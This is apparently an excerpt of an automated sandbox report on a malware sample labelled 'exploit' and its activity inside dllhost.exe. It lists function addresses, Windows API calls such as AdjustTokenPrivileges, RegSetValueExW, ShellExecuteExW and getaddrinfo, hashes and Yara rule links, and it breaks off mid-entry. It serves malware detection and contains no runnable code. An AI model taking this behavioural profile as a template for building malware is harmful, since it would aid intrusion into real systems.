Instruction ID: bbab86131d09cf5e9684f0a64db056721d8e588b0cf6eb66f5c3d86b0b81770f
Opcode Fuzzy Hash: 8aaf730f4cc25049f46ae8767c50e23872162c2872857dc2b68c713521c7d383
Instruction Fuzzy Hash: B521A172508384AFD7228B11CC45F67BFB8EF46324F08859AE945CB592D364E948C772

Uniqueness

Uniqueness Score: 0.21%

Function 001CA986, Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 001CAA05

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b35f0a57391f3981ba0ae258bc7bc79a3ff8d5b247623f1e3337beab5794604a
Instruction ID: 4ec3027411d5a81a6dc8c27a7209b6e17b437109a3cbea328ee1736734741636
Opcode Fuzzy Hash: b35f0a57391f3981ba0ae258bc7bc79a3ff8d5b247623f1e3337beab5794604a
Instruction Fuzzy Hash: AE219C71504344AFEB21CF65CD85F66FBE8EF08318F04846EEA458B652E775E804CB62

Uniqueness

Uniqueness Score: 0.01%

Function 001CA646, Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 001CA6B9

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 9e1d9a0984cb3b7b3c0fa8410ce8fc0b602ac00d68d3906f324085bd171d0fb8
Instruction ID: 219e495e61b4482771c929e8af2126db139fc8fcf1f187f4356e815d138ef81c
Opcode Fuzzy Hash: 9e1d9a0984cb3b7b3c0fa8410ce8fc0b602ac00d68d3906f324085bd171d0fb8
Instruction Fuzzy Hash: 2E21DE75504344AFE721DF25CC85F66FBE8EF14324F0884AEEA448B641E370E805CB62

Uniqueness

Uniqueness Score: 0.03%

Function 001CAC0E, Relevance: 1.6, APIs: 1, Instructions: 70
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E38,4974BC4E,00000000,00000000,00000000,00000000), ref: 001CAC8D

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 45f880660ee75069894377f9ff5b95f38514e3963b594599dd48412289a534b6
Instruction ID: d34308be6e8a9ff016882e15a2294a6669be1ef03020d7d73efeda0b56b5f7b2
Opcode Fuzzy Hash: 45f880660ee75069894377f9ff5b95f38514e3963b594599dd48412289a534b6
Instruction Fuzzy Hash: A221D472409384AFDB22CF51DD44F57BFB8EF45324F08849AEA458B152D324A908CB76

Uniqueness

Uniqueness Score: 0.01%

Function 001CAA6C, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,00000E38,4974BC4E,00000000,00000000,00000000,00000000), ref: 001CAAF1

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: a43b261fdb55deae2ea442adc73bbb85a989aa1b6dff50badaeaaf50cf818d1c
Instruction ID: 62d5abdaa41d38b389632440c1800fbe9560c08b959831e6d7b49780e19a6a46
Opcode Fuzzy Hash: a43b261fdb55deae2ea442adc73bbb85a989aa1b6dff50badaeaaf50cf818d1c
Instruction Fuzzy Hash: 5D21D571409384AFE7228B159C44FA3BFBCDF46720F0881DBE9858B193D364A908C771

Uniqueness

Uniqueness Score: 0.14%

Function 001CA392, Relevance: 1.6, APIs: 1, Instructions: 69
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(?,00000E38,4974BC4E,00000000,00000000,00000000,00000000), ref: 001CA40C

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 3ea30bb79029e8f568383acec195eaf1c5cab08c73be92c34dd5ef890dcdd950
Instruction ID: fa493cd6059a1b6ad86d0115a97ff88d8931b928b24f81ec982c9a3a4f643cf6
Opcode Fuzzy Hash: 3ea30bb79029e8f568383acec195eaf1c5cab08c73be92c34dd5ef890dcdd950
Instruction Fuzzy Hash: 9E21AE71604208AFE721CE11CC84F66B7ECEF54724F48845AEA458B652D760E945CAB2

Uniqueness

Uniqueness Score: 0.03%

Function 001CA486, Relevance: 1.6, APIs: 1, Instructions: 65
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNEL32(?,00000E38,4974BC4E,00000000,00000000,00000000,00000000), ref: 001CA4F8

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 9edf9366eb054cc4c3a99b1f03d64f6da66747937d5530c1f634bce7fa43f0e4
Instruction ID: 32623f64afc67d040c59059007809b49e5fef229bddd763b8ab7aa682ade1cbe
Opcode Fuzzy Hash: 9edf9366eb054cc4c3a99b1f03d64f6da66747937d5530c1f634bce7fa43f0e4
Instruction Fuzzy Hash: 3C11D371504304AFEB218E11CC45F67FBECEF54724F08855AEE458A642D760E944CAB2

Uniqueness

Uniqueness Score: 0.21%

Function 001CA2D2, Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 001CA330

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 3fab6c9de1a750fe36fb90474a5569c86957577aedabdeb6487aceeda19bf2a5
Instruction ID: c177eeabb3b3835c743d7f0ce42ed3e06a2d0b6504e69b62d8c4917193e36ae4
Opcode Fuzzy Hash: 3fab6c9de1a750fe36fb90474a5569c86957577aedabdeb6487aceeda19bf2a5
Instruction Fuzzy Hash: 53212C7140E3C49FD7138B259C55A51BFB49F57224F0D80DBED848F263C269A808DB62

Uniqueness

Uniqueness Score: 0.01%

Function 001CAE30, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 001CAE8C

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 41a44f06c66c5c8a6ab488301ea732fe1d5ef6b1e512f53b9de5a926ecec99ea
Instruction ID: 1824783670162257df88d4e1991e18ba32527382e00505a68b99bee1f9da4648
Opcode Fuzzy Hash: 41a44f06c66c5c8a6ab488301ea732fe1d5ef6b1e512f53b9de5a926ecec99ea
Instruction Fuzzy Hash: C41182715093849FDB22CF25DC99B52BFB8DF56224F0884EAED45CB252D274E908CB62

Uniqueness

Uniqueness Score: 2.84%

Function 001CAC2E, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E38,4974BC4E,00000000,00000000,00000000,00000000), ref: 001CAC8D

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 086369a4220079fed86036a9f5c62a1ff3b5081fd25c33dee24381f5cad033ed
Instruction ID: 6d903f8635a86fc4c4238485c1e25f563136fea4160208ddba67865882be8a3e
Opcode Fuzzy Hash: 086369a4220079fed86036a9f5c62a1ff3b5081fd25c33dee24381f5cad033ed
Instruction Fuzzy Hash: D4112372404304EFEB21CF51DD85F66FBA8EF54324F04885AEA058B652D774E904CBB6

Uniqueness

Uniqueness Score: 0.01%

Function 001CAA9E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E38,4974BC4E,00000000,00000000,00000000,00000000), ref: 001CAAF1

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 0a9a3203160894914ada96d7ebb284bba7a296ffa72915ab8c86339157eb5919
Instruction ID: 81c1be6829a40c8dc0dc1c43a1f9655d4d89684ee03fa749112e729c22ba9fee
Opcode Fuzzy Hash: 0a9a3203160894914ada96d7ebb284bba7a296ffa72915ab8c86339157eb5919
Instruction Fuzzy Hash: 99010071504204AEE7218B01DD85F66BBA8DF84324F08C09AEE048B682D764ED04CAB2

Uniqueness

Uniqueness Score: 0.14%

Function 001CAE52, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 001CAE8C

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 5389dbc0a59e6c536f1e37943ba8ea26fc8f786a00fcd9f81c43b5053457311f
Instruction ID: d8e7f219977799fcc4db92d878a7d370de4549fb936a01711b73de72c273e950
Opcode Fuzzy Hash: 5389dbc0a59e6c536f1e37943ba8ea26fc8f786a00fcd9f81c43b5053457311f
Instruction Fuzzy Hash: FE01D2315043448FDB24CF19D889B65FBD4DF54324F48C4AAED09CB252D774E804CBA2

Uniqueness

Uniqueness Score: 2.84%

Function 001CA2FE, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 001CA330

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 88cf40a1d3581f58f088534e4c6ee5f1264c1afee22d0ed5581b3213bfeba9e4
Instruction ID: 79ebac8a76201dbd495c6669c8c809530b55208af5ebbead1998eeafcf175af6
Opcode Fuzzy Hash: 88cf40a1d3581f58f088534e4c6ee5f1264c1afee22d0ed5581b3213bfeba9e4
Instruction Fuzzy Hash: D8F0AF35808388DFDB218F09D989B25FBA0EF54724F48C09ADD494F712D375E944CAA2

Uniqueness

Uniqueness Score: 0.01%

Function 001CA710, Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 001CA780

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c1a9d35fa9f202dab4f5f41dc77c8c280422ee4a7c4e36425e8422238fc80d6d
Instruction ID: d7347b2294c1f9464303b9546d63db7a05a9b7e2b8a38a3953c51a502f1a5c6c
Opcode Fuzzy Hash: c1a9d35fa9f202dab4f5f41dc77c8c280422ee4a7c4e36425e8422238fc80d6d
Instruction Fuzzy Hash: E721C3B54093C49FDB128F25DD89B51BFB4EF02224F0984EFED848B653D2659909C762

Uniqueness

Uniqueness Score: 0.03%

Function 001CA74E, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 001CA780

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1b1f284ce673b64975f2509f36ac9089b604fe2cc5e19ea3d48b9daf3133240e
Instruction ID: 04fe523be59ed238cb3237d84c53fc5d0b9963f3a7383be039ca39dc89b6ecde
Opcode Fuzzy Hash: 1b1f284ce673b64975f2509f36ac9089b604fe2cc5e19ea3d48b9daf3133240e
Instruction Fuzzy Hash: 5001DF715043448FDB158F25D989B65FBA4EF40324F08C4ABED09CB612D775E844CAA2

Uniqueness

Uniqueness Score: 0.03%

Function 004F06D1, Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.533965168.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4f0000_exploit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf2b8f5dc8f762330e519173418bae0d9db4af9d5dd87576762a7d28c68189c4
Instruction ID: 5fbc0b692575d277ae043dae6edf31943ae0768edf59e9fb7ea981091241b3a8
Opcode Fuzzy Hash: cf2b8f5dc8f762330e519173418bae0d9db4af9d5dd87576762a7d28c68189c4
Instruction Fuzzy Hash: 9DA1B030B482488FCB18DB74D494B7D37A2EBC8748B148879D90A9B7A9DF319C56CB91

Uniqueness

Uniqueness Score: 0.00%

Function 004F001A, Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.533965168.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4f0000_exploit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ccf81de4e6af46e84e866d8ade6e53e73cef9fac2529134fdd644091988a948
Instruction ID: 9ffc49204f628377d2f6ddff536123c43ff76bd0a428d3b2519968e011f4c45a
Opcode Fuzzy Hash: 9ccf81de4e6af46e84e866d8ade6e53e73cef9fac2529134fdd644091988a948
Instruction Fuzzy Hash: 9351E23094E3C9CFC309DB34E895969BBB1AFC130870589AAD1448BA7EDB785D58CB91

Uniqueness

Uniqueness Score: 0.00%

Function 004B0804, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.533958597.004B0000.00000040.00000040.sdmp, Offset: 004B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4b0000_exploit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c23926d061e93d2527823fdb18a24f43236f700685da16db6d66de6beca30265
Instruction ID: 7b92a396f86de597c62c2a9630059e54ba57946bc4e5032a8e82aedc0b15d885
Opcode Fuzzy Hash: c23926d061e93d2527823fdb18a24f43236f700685da16db6d66de6beca30265
Instruction Fuzzy Hash: 56F0C8765497806FD7158B06AC41853FFA8DF8663070884ABFD498B612C125B908C771

Uniqueness

Uniqueness Score: 0.00%

Function 004B081E, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.533958597.004B0000.00000040.00000040.sdmp, Offset: 004B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4b0000_exploit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e705e35b58b1c07e8ee29fdcf571c08d9bc519cd9050d7746563d77bc32990b
Instruction ID: 2fc70c5bd3f2f85a49943aa29b5464611bd6f50523328b075fdb9041f6a1c58a
Opcode Fuzzy Hash: 9e705e35b58b1c07e8ee29fdcf571c08d9bc519cd9050d7746563d77bc32990b
Instruction Fuzzy Hash: 9AE09276A447048B9654CF0AED81452F794EBC4630B08C47FED0D8B711D635BA44CAA1

Uniqueness

Uniqueness Score: 0.00%

Function 001C23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.533566270.001C2000.00000040.00000001.sdmp, Offset: 001C2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1c2000_exploit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c4619ecc9b04c91ce69091d2fe73e6009f6da6db4fd6a0a8b1f1e7d241b06d4
Instruction ID: 33b6904c866ea1c418f341472cb037647174b57b2e32d0b2a0d5cb15a5e1103a
Opcode Fuzzy Hash: 5c4619ecc9b04c91ce69091d2fe73e6009f6da6db4fd6a0a8b1f1e7d241b06d4
Instruction Fuzzy Hash: 68D05E793096914FD31A8A1CC1A8F957BA4ABA1B04F5644FEE800CB6A3C378D981D300

Uniqueness

Uniqueness Score: 0.00%

Function 001C23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.533566270.001C2000.00000040.00000001.sdmp, Offset: 001C2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1c2000_exploit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7509f98d5e223df7b28515faf79dcf2ca3410a7afc860ddc88d4de7bb3f70f34
Instruction ID: eb3d6881ac78230ada46a5c8a9cd359dcd427cd2df96d2d65f190ed5f38b98db
Opcode Fuzzy Hash: 7509f98d5e223df7b28515faf79dcf2ca3410a7afc860ddc88d4de7bb3f70f34
Instruction Fuzzy Hash: BFD052343002818BCB2ACA0CC298F59B7E4BB94B04F1684EDEC108B666C3B8EDC0CB00

Uniqueness

Uniqueness Score: 0.00%

Non-executed Functions

Analysis Process: dllhost.exe PID: 2612 Parent PID: 3068 dllhost.exeCOMMON

Execution Graph

Execution Coverage:	26%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.4%
Total number of Nodes:	175
Total number of Limit Nodes:	8

Executed Functions

Function 005B14AF, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 005B152F

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 0db83f4e68e3326782264edd9cd918a515d6c3893ad1bc23c76b3edde4a64edc
Instruction ID: d51f489bb396b7aea5722ec42c6eb2d2c2ff0947de88f5ab4cebb056d50a4636
Opcode Fuzzy Hash: 0db83f4e68e3326782264edd9cd918a515d6c3893ad1bc23c76b3edde4a64edc
Instruction Fuzzy Hash: 5421D1765097809FEB22CF25DC54B92BFB4EF06310F0884DAE9858B163D274E908CB62

Uniqueness

Uniqueness Score: 0.38%

Function 005B14E6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 005B152F

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 2271ad081f7508b82fb700ece97d919d4a83b67bc18398f355ecc529bd898b89
Instruction ID: f5677e301879ae8cd7306253e00efb2828046f27d97c47de8c930e5b9d6fa3b5
Opcode Fuzzy Hash: 2271ad081f7508b82fb700ece97d919d4a83b67bc18398f355ecc529bd898b89
Instruction Fuzzy Hash: 49118C765007449FDB60CF55D884BA2BBA4EB44320F08C8AAED468B662D331E814DFA1

Uniqueness

Uniqueness Score: 0.38%

Function 00531050, Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00531077

Memory Dump Source

Source File: 0000000B.00000002.756304115.00530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_530000_dllhost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7a5ba7129dee07b6276725a156fa7ecec4b917dc7c34b0eb38d610ed181bb333
Instruction ID: 05bc8ac971d4ebcc6b9ca5c15754cc81ead9ad456254c081baac1e976fd8e608
Opcode Fuzzy Hash: 7a5ba7129dee07b6276725a156fa7ecec4b917dc7c34b0eb38d610ed181bb333
Instruction Fuzzy Hash: DD416D31A012048FCB58DF78C9855ADBBB2EF88314B18847AD909DB369DB34DD81CBE0

Uniqueness

Uniqueness Score: 0.08%

Function 00531040, Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00531077

Memory Dump Source

Source File: 0000000B.00000002.756304115.00530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_530000_dllhost.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6fad5b690aae513642bbcb67dc307f173e2af61dee28c7e73df3415188aa76d0
Instruction ID: 0f7f375f88672ec1bdfe4fa272c5495214c5ef1b94b2dfeeecfb286d02bb2452
Opcode Fuzzy Hash: 6fad5b690aae513642bbcb67dc307f173e2af61dee28c7e73df3415188aa76d0
Instruction Fuzzy Hash: 1D414130A012448FCB58DF74C9959ADBBB2FF88314B19846AD909DB369DB34DD81CBE4

Uniqueness

Uniqueness Score: 0.08%

Function 005B0257, Relevance: 1.6, APIs: 1, Instructions: 100
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(?,00000E38,?,?), ref: 005B031E

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: db89911b961a4fe5478a0bcd379f2aa921e4afba7eb880b7182d817cd1b30b3d
Instruction ID: 8614cc46479d37258804570c3a465e774f4fc2063f45c96ce6dd06e37d514268
Opcode Fuzzy Hash: db89911b961a4fe5478a0bcd379f2aa921e4afba7eb880b7182d817cd1b30b3d
Instruction Fuzzy Hash: 0131A07540E3C06FD3138B258C65A62BF74EF47614F0E85CBE8848F5A3D2296909C7B2

Uniqueness

Uniqueness Score: 0.03%

Function 005B19AA, Relevance: 1.6, APIs: 1, Instructions: 99
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(?,00000E38), ref: 005B1A71

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7b944a488807ee8a031b0173e6980fd81b07ebfb1581e89c6a9a6db8298f12df
Instruction ID: 0b8d25e81b95038c375365c284671fd5c2a603f3cc1001ef2704c6b552510eb3
Opcode Fuzzy Hash: 7b944a488807ee8a031b0173e6980fd81b07ebfb1581e89c6a9a6db8298f12df
Instruction Fuzzy Hash: 3D318D72504744AFE721CB65CC84FA7BFECEF45310F08859AE9858B552E324F909CBA1

Uniqueness

Uniqueness Score: 0.16%

Function 005B108C, Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(?,00000E38), ref: 005B1153

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: b87770dcd1df8793433a2b2449d2f3ceee5bdac737fed35fce3f87bdeb78c4c8
Instruction ID: 497307ca97fac61648d1514b01866ef2bd0fd4f0023e89e3826a3b0a232d9b5c
Opcode Fuzzy Hash: b87770dcd1df8793433a2b2449d2f3ceee5bdac737fed35fce3f87bdeb78c4c8
Instruction Fuzzy Hash: 7931C2B2504344AFEB21DB50DC85FA7BBACEF44714F04889AFA489B582D375A909CB71

Uniqueness

Uniqueness Score: 0.83%

Function 005B0880, Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E38), ref: 005B0917

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 05ccb1d2614d4733b740fbd36e067168d977f753063d50b07f638adfbc08f45c
Instruction ID: b76b5758102f12ba533bf59f4c1d362b36f07272bc56a7a60599de50adbb91eb
Opcode Fuzzy Hash: 05ccb1d2614d4733b740fbd36e067168d977f753063d50b07f638adfbc08f45c
Instruction Fuzzy Hash: 8F319372508344AFEB21CB64DC45FA7BFE8EF45710F08849AF944DB592D364E909CB61

Uniqueness

Uniqueness Score: 0.70%

Function 005B0F84, Relevance: 1.6, APIs: 1, Instructions: 89
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessTimes.KERNELBASE(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 005B1021

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 5b755841fbb83831b7493e23a4542bbe69ec7f0c050ff42eef98741f044fd28f
Instruction ID: 67126d60d3477fe6a72978107bfbe83cc02e926b8005ce59ac772c6edccd7a9d
Opcode Fuzzy Hash: 5b755841fbb83831b7493e23a4542bbe69ec7f0c050ff42eef98741f044fd28f
Instruction Fuzzy Hash: 1C312BB25093806FDB228F21DC45FA6BFB8EF46310F0884DAE984CB193D325A905C771

Uniqueness

Uniqueness Score: 1.05%

Function 001BA612, Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 001BA6B9

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: de48e7b79b25d7587557ccfde51d5f7fdeefaf6c8239a2a0960a8d66b5a511fc
Instruction ID: 022b1ed2e2d8995622757506316d156ff2dad380017e4e0c2fcbf16176093610
Opcode Fuzzy Hash: de48e7b79b25d7587557ccfde51d5f7fdeefaf6c8239a2a0960a8d66b5a511fc
Instruction Fuzzy Hash: 4431C2B55093806FE722CB25CC85B96BFF8EF06314F08849AE944CB293D375A909C762

Uniqueness

Uniqueness Score: 0.03%

Function 001BA8A4, Relevance: 1.6, APIs: 1, Instructions: 87
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(?,00000E38), ref: 001BA945

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: daa28d60d5b5df08932a85c421e49e94948b5c414d8409386cec95b1bb1a8bdd
Instruction ID: cd5f3a5c2aaa94a6c53a399025f5f1a44fd832f585f601b90b2c950a4b03e18a
Opcode Fuzzy Hash: daa28d60d5b5df08932a85c421e49e94948b5c414d8409386cec95b1bb1a8bdd
